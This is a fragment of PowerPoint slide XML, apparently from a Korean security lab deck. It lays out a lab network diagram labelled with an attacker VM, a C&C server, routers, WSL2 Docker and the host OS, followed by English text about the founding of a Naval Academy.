                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0F0F892-109F-49BD-A928-EAAD6D087AA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2000212" y="2440307"/>
            <a:ext cx="832733" cy="11103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9" name="Picture 4" descr="노트북 이모티콘 💻">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4210117A-FD74-4096-9158-41E5582AB0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304" r="2479"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7898048" y="2846797"/>
            <a:ext cx="1191320" cy="8921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가상머신에 윈도우7 설치하기! - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29CAB48A-F59F-4B69-BE10-55E224D4F4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3649594" y="2505954"/>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8" descr="라우터 다이어그램 아이콘 벡터 드로잉 | 공용 도메인 벡터">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACAE4728-91AE-4605-AECA-E2829A04A5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2799681"/>
            <a:ext cx="340590" cy="250893"/>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6" descr="가상머신에 윈도우7 설치하기! - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAF7F9C-EF5F-4D9E-AD97-253DA233237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2493933"/>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가상머신에 윈도우7 설치하기! - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF30A985-5860-4876-956E-4A6FB6DEA7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3165762"/>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8" descr="라우터 다이어그램 아이콘 벡터 드로잉 | 공용 도메인 벡터">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23BBCD0E-15A4-4BBE-B5A8-0B0737EC1D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3133254"/>
            <a:ext cx="340590" cy="250893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1052" name="직선 연결선 1051">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F971BEC-A815-4FE5-9476-7B9E7B56A0C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1030" idx="2"/>
            <a:endCxn id="1050" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819889" y="2795210"/>
            <a:ext cx="335164" cy="129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직선 연결선 186">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA44BA2C-4C73-4FD0-8594-15DECE2D6F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1050" idx="2"/>
            <a:endCxn id="184" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4325348" y="3050574"/>
            <a:ext cx="0" cy="82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직선 연결선 189">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B592736-3960-4BE0-AF94-0FAEABF5595B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="184" idx="3"/>
            <a:endCxn id="183" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495643" y="3258701"/>
            <a:ext cx="238702" cy="51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id="{79A6ECD4-54AC-42A6-9121-01B4F48A6021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1050" idx="3"/>
            <a:endCxn id="182" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4495643" y="2783189"/>
            <a:ext cx="408997" cy="141939"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1071" name="화살표: 오른쪽 1070">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47523657-EAB1-4F53-B475-13A8B721FDC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3134433" y="2884907"/>
            <a:ext cx="170282" cy="125447"/>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2" name="TextBox 1071">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB437163-D861-4E48-B602-EFB3C8ACA03C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360193" y="2029162"/>
            <a:ext cx="919391"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1074" name="직선 화살표 연결선 1073">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5918C44C-84BB-4D97-B635-BED267378DF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1072" idx="2"/>
            <a:endCxn id="1030" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819889" y="2275383"/>
            <a:ext cx="0" cy="23057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CAC1C278-4026-409F-8424-14E062B4BAAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4423908" y="3579815"/>
            <a:ext cx="975028" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>VM</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="TextBox 220">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CF3A042-A706-4939-AFB9-D635448EA4F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4447937" y="2022462"/>
            <a:ext cx="919391" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>C&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>C server</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="222" name="직선 화살표 연결선 221">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09DBF391-D859-44D0-8B26-A80332390C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="221" idx="2"/>
            <a:endCxn id="182" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4904640" y="2268683"/>
            <a:ext cx="2993" cy="22525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직선 화살표 연결선 224">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{339AE3EC-0296-4FB1-A105-FB19A9DAABE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="220" idx="0"/>
            <a:endCxn id="183" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4904640" y="3455018"/>
            <a:ext cx="6782" cy="12479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8E64A489-8668-4D5E-A711-B7A96D168BF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360193" y="3121215"/>
            <a:ext cx="719330" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="229" name="직선 화살표 연결선 228">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1410F67-E27A-47C9-9950-F69B963A9C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="228" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3719858" y="2991297"/>
            <a:ext cx="400840" cy="12991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0" name="직사각형 239">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A0F921A-C462-4724-9038-A4185C0D06D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7734535" y="4447410"/>
            <a:ext cx="769090" cy="92896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1" name="Picture 6" descr="가상머신에 윈도우7 설치하기! - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D357B360-87AF-4CF1-A902-715CEA8CAA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7898048" y="4986297"/>
            <a:ext cx="340590" cy="289256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="TextBox 237">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{979B9D4B-EF2F-4EE4-96EC-4B2AD1FD4835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7708953" y="4694317"/>
            <a:ext cx="872726"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pic>
        <p:nvPicPr>
          <p:cNvPr id="129" name="Picture 10" descr="Microsoft Window Operating System, OS Software in Nehru Place, Delhi ,  Xpert Infotech | ID: 10905071197">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A64F1CE-2950-4803-BC25-03358DBB8E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5581" y="4592223"/>
            <a:ext cx="738379" cy="476590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="TextBox 242">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D91ABBB4-80A4-464B-BA2A-2682249976B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7561410" y="4213985"/>
            <a:ext cx="1157864" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>WSL2 docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="131" name="Picture 12" descr="리눅스 종류] 리눅스는 왜 펭귄 로고를 사용할까? 우분투 리눅스 추천 [웹사이트제작 와플즈] : 네이버 블로그">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{336C1829-F79F-4784-B4F6-1335A65D8A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12781" y="4504760"/>
            <a:ext cx="328913" cy="196083"/>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직선 연결선 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99485EF8-1D92-47B6-A4D3-9A500B45430C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7734535" y="4718170"/>
            <a:ext cx="769090" cy="0"/>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68D021B0-6A24-4B8D-9681-DA7A48547765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8122415" y="5471181"/>
            <a:ext cx="888017" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&lt;Host OS&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="136" name="직선 연결선 135">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC5BCA-78ED-4682-BF96-FCA0D5FAA163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1029" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8493708" y="3738963"/>
            <a:ext cx="9917" cy="468962"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="A6A6A6"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="80" name="그룹 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C5DE3BB-63B8-4286-9F91-46D15C3225A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="사각형: 둥근 모서리 80">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A404E29-5740-4AC8-91F1-FFCCD6E3E9A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TextBox 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36F4DCEA-6CF4-4378-8E7A-D073A93651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4" name="화살표: 오른쪽 83">
              <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB4C077C-3A8D-4F9D-B6BB-D5448ECC3FB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49890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6F33F77-0FA1-4DDC-9782-912BE77CDC9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9BDFFE5-4D30-4CDF-9705-DD5BE998723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877B000-7D81-494C-A9DC-49311414D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FA0C82B-6109-48F4-A92F-671FF4C778A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4" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1149FC60-4487-4D5B-8F5A-F69B0C879E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9882353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pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F95EDA-569B-4FB2-B8C1-A4F23D8189D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="496940" y="1666873"/>
            <a:ext cx="5407156" cy="1250405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6C104C3-F5A9-437A-8789-2CF8A77C87A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="496940" y="3508851"/>
            <a:ext cx="5411777" cy="1009362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="그림 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A59A2EAD-2631-493C-88F2-63F874436A0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6282538" y="672914"/>
            <a:ext cx="5412521" cy="2904004"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="그림 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{297938BA-6BF2-42E4-B078-369F391F8FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6282538" y="4119399"/>
            <a:ext cx="5412521" cy="736990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="그룹 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DB58B12-BAA8-4374-878F-02C5409DE6EE}"/>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DCBE1A-958A-4B95-B7C1-E5704BC429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D912A439-DD84-4A0B-8D52-BDCB9F556A5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5DA8A7BF-DE0A-42FA-B11B-11FCB638AC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06853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Along </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>with liberation, the Naval Academy was opened to foster elite naval officers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>who </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>will protect the seas of the motherland </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>by Admiral Son Won-il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>and other marine pioneers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>The elite guardianships produced by the Naval Academy have dedicated themselves to their motherland</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>and are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>still striving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>to raise the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>status </a:t>
            </a:r>
            <a:r>
